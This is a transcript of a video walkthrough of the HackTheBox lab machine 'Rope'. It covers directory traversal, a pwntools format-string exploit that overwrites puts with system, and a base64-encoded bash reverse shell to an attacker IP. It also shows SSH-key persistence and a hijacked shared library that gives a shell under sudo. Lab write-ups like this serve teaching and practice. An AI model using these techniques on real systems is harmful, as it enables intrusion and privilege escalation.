What's going on YouTube? This is Ipsec. I'm doing ROP from HackTheBox, which is all about binary exploitation. There's two main challenges in this box. The very first one is the foothold on it, which is a custom web server that's vulnerable to a printf exploit, which you can use to both leak memory addresses and execute code. And then the second challenge is kind of like a standard ROP challenge, but the binary is compiled with stack canaries, so you have to brute force a stack canary before you can do any ROPing around. With this box, we're going to do something a little bit unique and kind of solve it twice. The first time through this, we're going to take advantage of PwnTools and all it has to offer. So instead of actually manually crafting a printf exploit, we can just call like fmt string underscore payload, and it just does all that magic for us. When it gets to doing the ROP binary, we can have PwnTools do all the magical rebasing, create the ROP chain for us, so all we have to do is write the syscalls. It makes life easy. But once we get all that working, we're going to go back and do it manually without taking advantage of PwnTools, so you can understand what's going on under the hood. So with all that being said, let's jump in. As always, begin with an Nmap, so -sc for default scripts, -v enumerate versions, OA output all formats, print the Nmap directory and call it ROP, and then the IP address, which is 10.10.10.148. Can take some time to run, so I've already ran it. Looking at the results, we have just two ports open, the first one being SSH on port 22, and its banner tells us it's an Ubuntu server. And then we also have a second port. Nmap's not exactly sure what it is, but it's listening on 9999. And based upon the Nmap script fingerprint-strings, it looks very much like a web server because we just see that HTTP 200 OK and a bunch of HTML. So I'm going to go over and we're going to go to 10.10.10.148, port quad 9s, and looking at the page, the title is login v10, and it looks to be just a login form. I'm going to press Ctrl-U to go over to the source code to see if I can identify any technologies it's running, WordPress, Drupal, PHP, etc. The CSS sheet, this may be good. Scrolling down, we do have main.javascript as well. Looking at this, doesn't look too interesting. The next thing, the input looks like it wants potentially email, but outside of that, I don't know. I don't like reading JavaScript, so we'll just probably come back to that if we need it. We can try logging in. So intercept is on. Let's turn it on here. And then try admin and please subscribe. Click and go. And the actual request doesn't have any data. We just did a get, no parameters. It's not a post to put the username and password, and that's it. So let's try putting an email real quick, admin@localhost.com, and we'll put please subscribe here. Click send, and we still don't get anything. So I'm going to go back to the repeater tab, looking at the header. I don't really see anything too interesting here. I'm going to try looking at what a 404 page looks like. So I'm just going to get please subscribe because I doubt this actually exists on the server. We get that 404 not found, but now it's leaking the server. We see simple HTTP server. And at first glance, you may think this is like Python, but Python's user agent is not like this. Number one, Python would always like camel case it. And number two, it just doesn't look like it. So if we just start up a web server, so simple HTTP server, and then we can curl-i is a head request, so we're only going to get the banner, and 127.0.0.1, 8000, we can see what its banner looks like. And if this was Python 3, we could also do that with Python 3-m http.server, go down, and it's pretty much identical. The only thing that changes is the Python version. So we don't know exactly what this web server is, but the very first thing I always do when I come to an unknown web server is try good old directory traversal in the URL, because for some reason that's common on web servers. Did I screw this up? Let's do one more maybe. and keep going down. Maybe it has to be exact. Oh crap. There's two S's in pass WD, and we get the actual output. It always helps to double check things because the number of times I've made a typo and just assumed it wasn't vulnerable is pretty high. And then you waste a bunch of time, you come back to it and you're like, wait, I thought I checked that. But yeah, so it's got directory traversal here. We can try just getting like get etc pass WD, file not found. But if we put a slash, we actually get it. So what this is doing is probably just like saying, hey, on this GET request, go up one character and open everything after it. So probably looks something like this. And because we put the slash here, it can grab it. So doesn't really matter because we had path traversal. This just makes it a little bit easier. If we get slash, it actually just does a directory listing on the root directory, which is super handy. So the very first thing I want to do is probably grab the binary. So we can go is proc self and probably cmd line. And we don't get anything. Let's try environ. Don't get anything. CWD. And now we have something. So rendering the page, we can see there is a binary here, HTTP server. There's also run.sh. So let's take a look at what that is. And if you're confused about this, let's see, source, home, John, but confused why this worked, this is just an alias. So inside the proc, you have PIDs for every process that's running. There is a hidden like self directory, which is going to be your PID. And then there is this CWD. Whoops, I need L. And we can just grep for it real quick. That is just symlinked to your working directory. So if I go make dir HTTP server, go into this, do that ls again, we can see proc self is now pointed to the new working directory. So we can probably just grab HTTP server. And this is a binary. So I'm just going to curl this one. We could probably right click and copy to file, but when I can curl, I prefer just doing that. So 10.10.10.148 port quad 9 -o HTTP server. Then chmod plus x. And we can do a file against it. This is an ELF 32-bit. And if we execute it, we can show off that HTTP server. Curl localhost quad 9, and it looks like it does a get on index.html. So test looks like get, and it's going for /test. So looks like we have everything. The next step is to analyze this in Ghidra. So let's open up that application. And we can just click on the little dragon. And once this loads up, we'll hit I to import a binary. And go into root HTTP boxes rope HTTP server and open this up. Click OK. And I will want to analyze this. Select everything. Click OK. And it's telling us right now it's a 32-bit ELF. Looks like we've analyzed everything. I don't see that burrow running. Let's look at exports. And we'll go to main. And let's just scroll until we see something that looks familiar. So right here, we do have the printf call, And that's where we saw the listening on port when we just executed this. If I just do HTTP server, we got that. So we know what this is, local 13C. Based upon this printf, this is obviously going to be the port. And then local 134 is going to be the file descriptor. And the file descriptor is probably going to be 3 by default. So we could set like a comment. Forget the hotkey to do that. Semicolon and parent fd equals 3. And that kind of just helps analyze it a little bit. While true, local 12c is equal to accept, and then the file descriptor, and then these 2 variables. Accept is just a standard syscall, so you can just do man accept if you want to read about it. Does this tell us what it returns? Return will contain actual size and peer address. But, where is it? Accept. Oh, right here. Sock FD, sock address, and sock length. So we could say this one is sock ADDR, and this is sock LEN. Could help a little bit when we just go analyze it. Process 12C. This is the output of accept, and not exactly sure what this is. So the best way, if you want to understand exactly what's going on and what a variable is just run it in GDB. So GDB, HTTP server, we can just run it, Control C, disas for disassemble main, and then look for the call. So call accept. So go here, just break on this address, continue, curl, localhost, quad 9. You should definitely subscribe to my channel. Hit the breakpoint, and we can see, I don't know why it's 3 arguments. Accept. Oh, wait. We wanted what this returned. So if we just do next, it should go over this call. Maybe. I'm not sure exactly what's going on. Control C. Let's quit out and restart this. Let me just make sure. Okay, it wasn't running. Disassemble main. We wanted to look actually at the process call. So where is process? What was it? Yeah. So process is at this address. Copy, break, continue, curl, and it's giving us 3 arguments. We got 4. I'm guessing this is going to be a file descriptor. If we examine this, what is this? Cannot access memory. Don't know exactly what that is. But I'm guessing this is going to be a child FD maybe. I don't know. We can put child FD is 4 question mark. I'm kind of curious why process had 3 arguments when it's just 2, but that should be fine. let's go into process to see exactly what this does. And the reason why we can see all these function names is because this binary is not stripped. So process is a function within this actual program. It's not like libc or something. That's why if we do man process, we don't get anything about that syscall because it's local to this program. So we can take a look at what this does. It is going to fork, which means whenever we want to go into this, we'll have to set the follow fork mode to child. Then it's going to get a PID, do parse request. FD is param1. So this is definitely going to be correct. This is going to be child FD. And then PID. Well, I guess child is a bad way to word that, but oh well. This can be PID. Local 884.200. Don't know exactly what that means. We can look at parse request if we want to. It's got quite a bit. Here's index.html, so I'm guessing this is probably going to be like, get string length of, this can be file most likely, or we'll do HTTP underscore file, because if that length is 0, then it is now equal to index.html. So this is length of HTTP file, or we'll just call this, HR for handle return. Is generally what I call it. Let's see. There is a str copy. So this could potentially be a buffer overflow. So let's take a look at the sizes. This is the destination. This is what it's copying from. So local 810 is 1024. And we don't actually have the size of param2. This is most likely going to be like a struct or something in the C code, and Ghidra didn't really parse it correctly. But we can look at other things for what param2 is. And I see 804, 400, 800. So 800 is the closest thing I see. So I'm going to guess this is just going to be a length of 400. We'll just take a random guess. We can print int 0x400, 1024. So guessing param2 plus 0x400 is, was it 200? Yeah. 124 in length. So just put the comments there. If this was not 1024 and was like 40, which would be 64, then we'd be copying a potential of 1024 bytes into that, which could lead to buffer overflow. But because the lengths match there, it's probably safe to ignore. So let's go up one. We can just keep going down to examine what's going on here. Directory request, log access. If we look at log access, we can see param3 is being called directly to printf. And in printf, if the user ever has control over the very first parameter, you can do a memory leak. And then I think on most distros, printf has %n, which allows you to actually write. I want to say some distros may have removed it, but I may be misremembering that. So %n would be writing how many bytes had been printed before. But yeah, so let's take a look at what param3 is. So let's just go up to main. Was this on main? No, this is within process, I believe. Yeah, process log access. So let's take a look at exactly what that is being called with. So get out of this window. And let's see. Let's just clean this up. pkill-9 HTTP server. It's just a habit I have because sometimes when it forks, GDB follows the fork. Now the process is listening on its own, and you exit, and it just becomes a pain to... I'll show you real quick why I always run that kill. Let's just do run, set follow fork mode to child, continue, curl, quit GDB. If we curl, we're still running. So if I did GDB run and we try to break, I'm not actually broken because this application just, I don't think, checks if the port's listening first. So it can just be a headache when stuff is being outputted to the pane and you assume it's within your GDB session, but it's not. So if I do psef grep HTTP server, I can see it running still. So that's why I run pkill-9, because now if I curl, it's not listening. So now let's go trace that log access call. So what I'm going to do, run. Now we'll break in, was it process? And set follow fork mode to child. And then after process, we want to break on log access. We have to continue. So now we are within process. And if we disassemble this, we also have a break call in this log access. So 6DE, info B for breakpoints. Process. Oh, I'm actually breaking inside of log access. Let's break here. So we can delete 2, break there, continue, and we can see what each parameter is. So arguments guessed, local, so we probably wanted the third one, right? The third is param3, right? Param3, and that printf, yeah. So 1, 2, 3. That's going to be file name. So we can definitely control that. So if we put like %x here, we'd have the memory leak. Let's put log access, file name, param2. There's probably going to be some weird address. I can't access the memory. That's just pointing to it. Not exactly sure what that is. We'd have to look at the code more. One of those is probably the file descriptor or something, but we got the important one, param3, which is file name. Param2 is probably going to be the file descriptor since it's an integer. But let us look at printf now. So we can continue and just quit. We don't have to be in GDB to do this part. So we'll just pkill it, run HTTP server. And if we curl, and we'll do %x. Actually, we have to do %25%x. We have to URL encode this. If you look, % encode URL is %25. So I just URL encoded that, and we can see we got a address. If we do another one, we get another address. So what we do is put something here. I think that's 4 A's. 8 A's, yep. And then do a bunch of X's. So let's do Python print, was it dot %25x times, we'll do 128. So we can just copy all these. And then paste this. And we have a huge list of addresses. And what we want to look for is the A's. So we can just copy this, go back to Python, x is equal to that giant string. And if we just do x is equal to x.split on period. So now we just have a list, and we can do x.index and 1, 2, 3, 4, 1, 2, 3, 4. Maybe it's only 4 A's. 1, 2, 3, 4. It's at 53. So x, 53, and 54, because I put 8. We probably only wanted to put 4 A's there. So for some reason I was thinking this was 64-bit, but 1, 2, 3, 4. So this is a memory address. And now let's redo that. X is equal to this, and then the xsplit, xindex 53, so x 53 is the 4 A's, and then 54 is the next address. So now that we can we know exactly where we are, we can use the format string thing to write anything to whatever address we have here. So it's kind of hard to explain. I'm going to use PwnTools to do this the first time. And then if this video is not like 3 hours long like the last one, we'll go back and do it all manually. But essentially, printf will allow us to write anything we want to an address that we put here. So what we put is the actual address to symbol like puts, and we change that to be system. So the next time the application calls puts, it's really calling system, and we get code execution that way. So printf can also be used to cause an RCE along with leak memory. That's what I'm trying to get at. So let's just go to HTTP server. Let's do this in Visual Studio because we loaded it last week and Visual Studio makes everything nice. So I'm just going to do open folder, ROP, HTTP server, okay. And then file, new file. Let's just make sure we're in Python 3. Save as, we'll call this exploit.py. And then F5 to run. It is running as Python 3, so we should be good here. The first thing we'll have to do is our imports. The first being from Pwn, import star. This is PwnTools. Then we probably want to do some type of HTTP things. And I always like doing urllib parse import quote because I have issues with PwnTools quote module. Context, this is going to be i686, which is 32-bit, and the OS is Linux. Our host, this can be 127.0.0.1 for now. And then our port, oh man, I can't type right now, is quad 9s. I think that doesn't get put in quotes. I don't think it matters. The very first thing we have to do is probably make a quick wrapper around getting a file. So def get file, and we can do r is equal to request proc.get http our host our port and then the file. And then return our.text. And step 1 of our exploit is find addresses. Because we have ASLR most likely, we have to have a way to identify all the memory addresses. And the way we're going to do this is the proc self maps file because we have LFI. So finding binary libc location via proc self maps. And if we go to burp suite, let's go to repeater, take a look at what this is, proc self maps, and we don't get a file. So let's go open GDB back up. Let's go to process. This is where it forks, right? Yep. So let's see. Parse request. This is probably the one we want. Could also be serve static. Take a look at what parse request is. Going down. And right here, I see it supports the HTTP parameter range. So this is telling the server how many bytes to send back. So if we do proc self maps and say range bytes is equal to 0, 5, we get the first 5 bytes. If we do 0 to 1024, we get the first 1024 bytes. So let's try 4096. I just want to see if we can get the whole file. We get this. So for some reason, the, I guess, system just doesn't know how long this file is because it's dynamic. So since it doesn't have an end, it never outputs if we don't have that range. So again, take the range off. We don't get anything. We could also now try CMD line, and these things work. So all these files we just couldn't get because of just how the file system was behaving. But if we had tried the range parameter, we'd be able to get it. So this is, I believe, a standard HTTP thing. Let's just Google this. HTTP range header. Yeah. So definitely is a standard thing. So always handy to have that. But now that we know that, we can go back to Visual Studio, go to our request, and we can do header is equal to range, and then bytes 0 to 4096, and then headers is equal to header. So every request now will have that range. And that's going to be super handy because if we go back to this, this tells us exactly where everything is loaded. So we know the beginning address of HTTP server is right here. And the beginning address to libc is right here. So just knowing these two things will let us calculate all the offsets. So let's do maps is equal to get file proc self maps. And then we can do, I guess, address bin, or do, yeah, address bin is equal to maps.split, and we'll split it by new line characters. So each one of these will be a line entry, and we want to grab the first 8 characters. So after that split, 0 for the first one, and then 8 for the very first characters. And then address libc is equal to maps.split. Same exact thing. And this one will be 0, 1, 2, 3, 4, 5, 6. So 6 characters, or 6 lines. And the first 8. So now we know where both of those are. So we can do log success. Binary is at 0x address bin. And this is going to be libc is at address libc. So let's just try running this. And we get 2 different addresses. So that looks like it is going to be good. So let's just fix this casing real quick. So we got all the addresses. So step 2 is going to be calculate offsets. So log info, finding the address of puts and system. So elf is equal to the HTTP server. And I'm going to do check sec is equal to false. If we don't do that, then every time we load this little elf command, it's going to print out a bunch of debug stuff. And then libc is going to be equal to elf ./libc.so.6.32. And we'll have to download this. So check sec is equal to false. So I think that's just in lib32. Let's see, get lib32. See if we just get slash. We'll have to turn range off. Nothing's worse than leaving that parameter there, getting libc, and just having bad things happen. We need to have the first slash. So this is probably lib32. I guess we can go to a web browser. // and let's see, lib x32. Do we have libc here? libc.so.6. Download. cp downloads libc here, and we called it .32, I think. That's what we called it. Yep. And actually, let's do this locally first, because it helps doing it locally, because then I can show you all the addresses and we can check everything's working. So let's move this to be 32.target, locate libc, we can probably just cp user for lib32, libc.so.6, and libc so632 self. Okay. That should be fine. And then we can just say elf.address is equal to int address bin 16, because this right now is just a string, I believe. So doing int, saying base 16 will convert this to hex. And do the same thing for libc. Address is equal to int address libc 16. And these numbers were the ones we got from the maps. And we can do log success. Oh, we need to do puts and whatnot. So puts is equal to, this will be GOT puts, and not libc, elf dot GOT puts. And the next thing we want is system is equal to libc dot symbols, and we want system, I believe, and puts at GOT puts. This will be system libc is at system. And we should change, okay, our host is local. So let's just run HTTP server if we're not already. We are running it. Run the program and hope it works. We forgot to put F before this. Okay, that looks good. This can be, is it hex? We probably have to have unpack 60. Nope, we don't have to. Never mind. Forget what I was saying. We have this here. So let's run this again, but have GDB running. So GDB, HTTP server, run, send the request. Let's get all the addresses. And now we can just examine each of these addresses to see if it is correct. So Control C, that is the address of puts. And this is the address of system. So what we're going to use printf to do is put this address right here. And by doing that, will let us call system whenever the program does a put command. You can also type GOT to look at the global offset table. And we can see where it's at here this way as well. So let's go back to Visual Studio. And we're at step 3 now. And PwnTools makes this super duper easy because it automatically has a printf chain. So log info using printf, and it was 53. If you remember when we did that x.split thing, to remap puts to system. So now we can do payload is equal to fmt string payload. This is from PwnTools. Say 53. And then we put GOT puts, colon, the address system. And this should have been in squiggly brackets. And I think that's it. Just looking at this. Yeah, that looks fine. So the next thing to do is do a GET request. So where is it? We called it GET file. And we can just get payload. And I'm going to set a breakpoint here because I'm not positive exactly what this is going to be encoded as. So run this. Did we kill it? Continue. And I see that is in byte format, which I don't like. So let's just do .decode. I hate whenever it has that B single quote and you're trying to do some type of exploit. Run. UTF can't decode. Okay. So the answer to that is, by default, it always tries to do UTF-8. If you say Latin-1, this seems to work. Not sure if this is the correct way to fix that error message, but it is the way I use now. And we have now ran that exploit. So the next step to do is, I thought we should have saw something slightly different. Let's debug this. We may have to do some type of quote. I'm not sure if those pluses are actually there. But let's go and debug this. So actually, let's get away from doing this because we don't know exactly everything the request module does. And let's just do PwnTools now real quick. Remote. And we'll do, what is it? Our host, our port, then our.send. I don't know if I want to do our.send or send line. We'll do send line. F get, and then we'll do quote payload, HTTP 1.1, and new line, and then our.close. Let's see if this works real quick. Continue. Run it. And it's not our dot, it's our equals. Like that. We opened and closed the connection. And we have this. So it outputting something to standard out. If you're very observant, you'll know that is the output if you type get in all caps. But if not, let's go debug exactly what happened. So what I'm going to do is we'll break on process again and continue. And let's go execute this. Disassemble. Where are we? What is that fork call? Are we? Okay. So let's break after this fork. Whoops. So I'm going to do set follow fork mode to child. So now we can go into this. We'll just break on fork, continue. Next instruction to hop over this fork. I thought, that's my bad. I've always think when like break fork, it's going to break on the call, but it breaks soon as it enters fork. Come on, get out of this. Okay, we're in process. I don't know where in process we are, but we're in process now. Let's just go back to Ghidra. Decompile. We want to be where puts are. So log access is what we want. So let's break log access and hope we didn't pass it. Okay, we did not. It's weird. I don't know why it outputted that now. But what I want to do is break on each of these puts, and we'll look at it. So break stir here, break here, and break here. Continue. So we're at our first puts. And this one is just 127.0.0.1. This is going to be what it calls. So we can continue. The next one. Actually, it was calling this up here. It's the very first address on the stack that 32-bit grabs. So now it's calling puts on get. And if we look at what puts is, if we do GOT, puts, and look at this address, come on. Let's see. This should be system. That's in libc. Simple way to know. Let's just look at the script. System F7E165E0. And let's just step. Something weird is happening. So step in here, push, when puts, we should have went to system. So I think we went on the wrong request, and this one didn't get overwritten. So let's restart this real quick, and we'll try this one time. pkill-9 HTTP server. It's always the demo gods that get me. So what we wanted to do was set follow fork mode to be child, break on log access. No, we don't even have to break on log access. We can just break main, run this, disassemble log access, and then we can go right after this printf, and then look at what puts means. So B, right there, and then we'll break on each call. And we'll be a bit faster this time. And set follow fork mode child, continue, Python 3. Let's just make sure this is saved. Run it. So it did not break where we wanted it to. We're at the puts. We put a break in for printf. This is not behaving like I'd expect it to. So let's see. Did I run pkill last time? It's definitely killed now. And if I try to grab it, it doesn't work. B main, run, break, what was it? Up a few times, disassemble log access. Oh, there's two printfs. Oh yeah, there was two, and it was definitely the second one. So if we just break here, not new tab. And then this is the puts that I think I want. To save time, we won't break on each one. Set follow fork mode, child, continue. Oh, I know what's happening. So let's kill this. I'm doing 2 requests and I'm breaking the very first request and that's falling on to do the second. So let's see. We'll break right before the fork. So break main, and we can run this. And if I curl this, nothing's listening yet because we broke on main. This as process, and go to fork. Break here. And we will continue. And we want the follow fork mode to actually be on parent right now. So run this. It's going to do the first thing, which is getting it from proc self maps. Continue. Now we're breaking on the second HTTP request. So we're going to do set follow fork mode to be child. And now we can disas log access and go into this one. So break here. We want one more, F1. We can do both printf and this before and after. I'm feeling cocky now that we can explain this. So continue. We're going to hit this printf statement. And if I do GOT and we look at printf, or not printf, put, let's see what this is. That's glibc. Let's just continue. So now we're right after the printf, and that put is still, oh, yeah, the put definitely changed. I should have took note. So if we go up, this is the last one, puts is at 5.6 whatever. We can just echo. And then just recently, puts is at 7E165E0, which is system. So we could also now continue. Oh. Where are we? Did we die? Del 1, Del 2, Del 3, Del 4. I don't know exactly where we are. Here's a call. 3, that's the parent handler, or the parent file descriptor. Did we take too long again? I bet we're in like system or something. But now let's just try one last time to explain. So now that we have this pretty much down, pkill, run, break main, and then disas process to break on the fork call to grab the second one. And now disas log access. We want to break on this put. Okay. Continue. follow fork mode to be parent, del3, del2. I don't know what just happened there. Break main, run. That should be the fork. And this should be the puts call. Nope, those are not. You know, every time you think you understand and can explain it, something else happens. So, fork, we do not want you. I should have just hard coded it because it's not changing. So, get past the first one. We're at the second one, so set follow fork mode to be child. And then we want to break on puts now. So disas log access, and we'll break on this puts. See, I followed fork child, right? And something weird's happening, but if you go back in the video, you saw me go through the printfs or the puts. One of them was on put get. So what that's telling us to do is change a request, and we put our command here. So if the command was who am I, and we run this exploit. So let's just do pkill-9 HTTP server. And now we run this again. We can see it actually running the command, who am I? If we do ID, I bet you can guess, it runs the command ID. So now all we have to do is a reverse shell. So we'll do echo-n, was it bash-i, dev TCP 10.10.14.2, 9001 0 base 64. And we can't have spaces here, so we're just going to do IFS whenever we need a space. So let's do cmd is equal to bash rev shell. And this will be echo IFS base 64 IFS pipe IFS base 64, and that stands for internal field separator, and by default it's just equal to space. So that's the command. So we can probably just do cmd here. And the reason why I put this on a separate line is because how I'm doing the bracket expansion, this would resolve to a variable. So NCLVNP 9001. Make sure this is saved. And then run it. And we get a shell. So now we can go test on the target system. We have libc.6.32.target. So that's all we have to change out. So where is the libc? This will be target. Let's make this a bit more obvious. libc file, or we'll just do libc in all caps. I don't think that's taken as a variable name. Our host, our port, libc. And we can do 10.10.10.148. NCLVNP 9001. We can kill this HTTP server. We can run the exploit up here. Python 3, exploit.py. And if we did everything correctly, which we did not, we would have had a shell. So let's see. Our host 10.10.10.148, libc 32.target. And since we didn't error out here, we know that worked. Just try running it again. Let's try running it locally. .self ./HTTP server, and that works. So let's see, 56563000. So these addresses are different, so I think that's correct. Let's see, exit. I wonder if it's the wrong libc version. libc.so632 target. Elf 32-bit. That should be fine. Let's see, if config ton 0, I am 10.10.14.2. Oh, that's still going localhost. So change this to target. Look at libc to make sure nothing's hard-coded. The request on proc maps is definitely our host. That all looks surprisingly good. CMD quote payload. Run this again. And nothing. My only guess is we have the wrong libc. So let's go back to burp suite. And let's go to, what is it, proc self maps. If I can type. And we have to do the range. Was it bytes equals 0 to 4096? There we go. And let's just grab this libc. This may be a different one. We just grab like libx32 libc.so.6 or something. I wonder if we grabbed it off a localhost. I don't know what we did, but let's do curl dash just do curl 10.10.10.148 slash lib32. Yep. We'll have to do port 9999 dash o libc.x32.target 9999 and md5 sum libc. So we have 3 libcs. All 3 are different. So I'm feeling confident now. Let's grab this file name, go back up to the very top, change libc to be that, and rerun our exploit. And there we go. So having the right libc is definitely helpful. Let's see, cd/home. And we are John, so let's go into John. And we don't have anything, but we can drop an SSH key to get a better shell. So make dir.ssh, and let's do cd // ssh-keygen-f. We'll just call this rope cat rope.pub. We can grab this, copy, and then echo. Oh, we probably should have done a single quote. Oh well. Authorized keys. chmod 600 authorized keys. chmod 600 rope ssh-i rope John at 10:10:10 148. And is it gonna let me in? It's taking its sweet time. There we go. So that definitely does work. So let's exit that pane, exit this pane, and do an ls. Nothing, but at least now we can just get back into this box pretty quickly. But before we go forward, I just think I realized why I was having trouble debugging the HTTP server. So let's go back real quick and do that. I think it's because the system syscall actually forks. So it was forking that system 127.0.0.1 call and then never returning. So that's what I think happened. Let's take a look real quick. Visual Studio's up here. This wants to be localhost and a libc target. That was libc.so.6.cali, I think, or self. Let's take a look. ls http server target self. Okay, libc 632 self. So let's start this. So sslnp grep quad 9, it's not listening, so gdb, http server, break on main, run it, and now we want to disas, or for disassembly on process, go to the fork call, and we're going to break on this, and continue. Now we can run our exploit script. So Python 3 exploit.py. This is the first one of us grabbing proc maps. We don't want it, so we step over it. Then this is the second one. So we want to break here. So we'll do set follow fork mode child. And we want to do disassembly on log access. And let's do it on printf. It's this call that is doing the printf we want. So let's just break here. And then we continue to this printf. And now let us set follow fork mode to be parent. And if we do GOT, we can look at the puts call. And we see it is this. So echo that. We'll do next to step over this call. We can do GOT again. Look at the put call. We can see this is now resolving to system. That's the key. So you can see puts definitely changed, and this F7E1 is what we say system is. If you wanted to, you could debug it and see that is indeed system. So now the next thing is all these puts calls. So this is now doing system, not puts. So let's just break on each of these. And I believe system does do a fork. So we don't want to go into it. And I want to say I already set fork mode to be parent, but we'll do it again for good measure. So now we're going to continue, and it's going to break on the first put. And we're doing a put on whatever this is. Let's look at that actually. It is here. And we want to go process. And where is log access? So the very first call to puts is a blank line. So that kind of fooled me. So this is just probably nothing. Whatever. But the first call to put is a blank line. And hopefully we continue and hit a next call. We do. So before, that's when we went into probably libc system and never returned. But because we're not following the child, we no longer go down into that libc path, and we get back to this put. So we're doing a puts, and the very first argument is like the request method. If we look at that, that is what this one is. So we do a continue, hit the next put, and this is our payload. And if we didn't have the command as this, it would have just been get. But I forgot to change this piece back to get to make it look like an HTTP request. But now you should see exactly what is happening on this. And why I was having so much trouble. I really just hate debugging anything that forks because it's just a nightmare to keep track of the follow fork mode thing. But that is that. Hopefully that makes sense and that helped you. Let's now get back and do the next thing. If we do, we're back on SSH on rope as John. If I just do sudo-l, we see John may run the following command on rope, user bin read logs as r4j. So I'm going to do sudo-u r4j on this bin, and this is all we see. So it looks like it's just tailing the log, and I say tail because this looks like 10 lines by just eyeballing it. This SSH prompt is really slow. We can strace on this binary and kind of see what it does. Let's see, mprotect. So here's that call. We're doing user bin tail, and it can't open this because of permission denied. But I was checking to see if this was a full path. If it was just like tail, well, we could change our path probably to be current working directory. And as I say that, it's not going to work because this is sudo. And sudo is probably going to make that a secure path. So we can't edit the path and execute it because sudo is always going to set our path. But whenever you see a system call that's not an absolute path, generally something to play around with. But we can't see anything there. So the next thing to do is copy this binary and examine it. So let's do make dir read logs. And we can just scp-i /rope John at 10:10:10 148 user bin read logs, and we'll copy it to our current working directory. And come on, I don't know why this is going so slow. Look at top. That HTTP server is eating up a lot of resources. So we probably left it in a weird state, but oh well. We can just do Ghidra now. I'm going to hit I to import a new file, up one directory, read logs. Take a look at this, and we will analyze everything yet again. And let's see, exports, main, and all it's doing is print log. And we try to go here, we don't have this function. If we go back to John and go where this strace is, or we could probably just do it on a local machine now. If we do LDD on read logs, we can see it looks like it's looking for liblog.so. So what I'm going to do is locate liblog.so, and it doesn't find it. Let's just do find -name liblog.so, pipe it to dev null. I wonder if I had to do like stir or whatever. Kind of want to revert this machine because it's going so slow, but we found this, and what we can do is scp this file to us, and if we just do lsla on the file, let's copy this again. We can see it's chmod'd to 777. So we can overwrite this binary, and we can probably just create our own binary that calls this printlog and then executes system. So let's try this real quick. Let's do vi lib log dot, I guess, c, and then we'll do include standard lib.h, and we'll do void print log system bin bash. That looks good. And just want to compile this. So gcc liblog.c, and this is -shared, so it's a library, and we'll call this liblog.inject.so, I guess. I don't know. Go back to scp, and we'll do liblog inject.so to... I'm trying to debate if I want to copy it to his home directory or not. Let's just get a sudo command ready. So sudo sudo-l R4J. There we go. So sudo command is ready. Let's copy this file, and as soon as it copies, we'll execute it because there's probably a cron job restoring this. So it's copied, we run it, and we are now the R4J user. So just like that, we're able to switch users. If we go into home, R4J, and we can read user.txt, and we can also make dir.ssh and do this so we can easily get back to this user. Let's do cat rope.pub, grab our key, and we'll do echo this to authorized keys, chmod 600, and now we can try ssh-i rope.pub R4J at 10:10:10 148, and chmod 600. Oh, it's not rope.pub. We just want rope. That's the private key. Cat rope chmod 600 rope. I probably left the ... / when I went up a directory, so it's no longer that. Let's see. Come on, let me in. So we can get rid of this SSH connection. And now we are the R4J user as SSH. Normally I would run like linps here or linenum, but it is a CCDC weekend and I'm very short on time, so I'm just going to jump to it and show all the processes running by root. And we see that root is running a binary opt support contact. And this is definitely not a standard thing. Also, if we did ss-lnpt to show open ports, we have a port listening on localhost leet. So we got two things that we don't exactly know. If we go into cd opt support and do a ls-la, it is just a binary running as root, and the ADM user could execute it if they wanted to. So let's go make dir support, and let's do scp-i, specify our SSH private key, R4J at 10.10.10.148, and opt support contact, and copy it to our current directory. And I'm looking at this. I wonder if we'll even be able to read it here. Yep, we can. So ls-la, we have the contact binary. And if we go back into Ghidra, we can just press I, go up one directory, go into, where is it? Support, contact, click OK. Analyze it like always, select all, and we can kind of step through this. So right away, we don't see main under the exports. We have this entry, which is just the libc entry. This one is a stripped binary, so we don't have any of the function names. But this very first function right here, this is going to be the entry point. We can double click it. We can go in here and then press L to rename, and we'll call this main. And kind of go looking at what this is. We could just kind of execute it to get a head start and an idea. I'm just going to go into a new pane. Let's go into support /contact, and then we could like netcat localhost 1234. Oh no, this one is leet. And we see request accepted. And please enter a message to send to admin. Hello. Please subscribe to IPsec. And it just says done. So we could send a bunch of A's. So if we just copy this and send a large chunk, we see stack smashing detected, unknown terminated. So looks like it does have some type of Canary protection. We could verify that by just going gdb./contact, run it, and do check sec, and we can see Canary, yes, and it's got a static value. Now this is a stat Canary. It may make more sense in just a little bit, but this is going to stay the same as long as the program runs. If we do an exit or quit and rerun this and do check sec, the stat Canary changes. But as long as we don't terminate this process, it's going to stay the same. So let's go see exactly what this is doing. Based upon this printf, we already know what probably two variables are going to be. The very first one is going to be port, and this one is going to be file descriptor. Pretty easy. Let's see, local 30 accept. This is handling kind of like the HTTP server, I believe. So this is going to be, what was it? sock address, I believe, and this was sock length. And local 38, this is going to be file descriptor, I believe. Let's look at man accept and take a look. Yeah, sock FD. So we can just do like that. I forget exactly what we said this variable was. But nothing else is going on here. If we go down here, we got function, whatever, local 30. So this is the return of the accept call. If we go into this, we can kind of get an idea what it's doing. Right away, it forks. So I'm just going to call this handle request, because it's kind of what it's doing. It's handling our netcat request that we go into it. So calls fork, and then it's doing this get UID request accepted, doing a string length, function param1, please enter the message you want, and then calling this on param1. So, right, this is probably going to be the file descriptor. So this is most likely RDI, which is going to be 4, I believe. Let's do man write. Whoops. And right now we get a command write, not the actual syscall. If you did man, you can see page 2 is going to be system calls. So if we did man write.to, this will be where we want. So this is another file descriptor, FD. I said RDI because it's the very first argument, but we'll just call this FD. And then we're calling function on the file descriptor. So let's see exactly what this is doing. And let's see, local 10, param1, we know that was FD. So we're writing FD into local 48, and this is going to be 400. So let's look at what that is. Python 3 hex 0x400 or int 1024. So let's see. And what is the last one? Man receive. So sockfd buff length flags. So we're writing from FD. So this is going to be user input. So most likely this is the message we sent. And we can verify that in a second. But let's just call this user message, not FD. So like that. And we're writing up to 1024 bytes into local 48. And local 48 is defined at 56 bytes. So anything after 56 will probably crash it. And we can verify that by just going back to continue, netcat, localhost, leet, and we want to do python-c print a times 56, and we'll send 56 A's, and stack smashing detected. Let's go do the same thing and send 55 A's, and we don't get anything. So that is definitely a good sign. I'm guessing that said like 56 A's and then it did a line break. So even though it was 56, it was a hidden character because, again, you got to terminate the socket. So it probably sent a line break, us hitting an enter key. So let's go and debug this. So Control C, and we want to do disassembly. And let's see, syscall. I was looking for the fork. And we definitely don't have a disassembly main because we don't know where main is. We could probably do info functions and get a list of every function, which probably isn't going to be too helpful. Let's just call break on fork. Sweet. And then we can set follow fork mode to be child. And then continue. And we'll send this message. And let's do next 50 times. And looks like we're good. Let's see where we are. Disassemble. Let's see. Does any of this look acceptable? 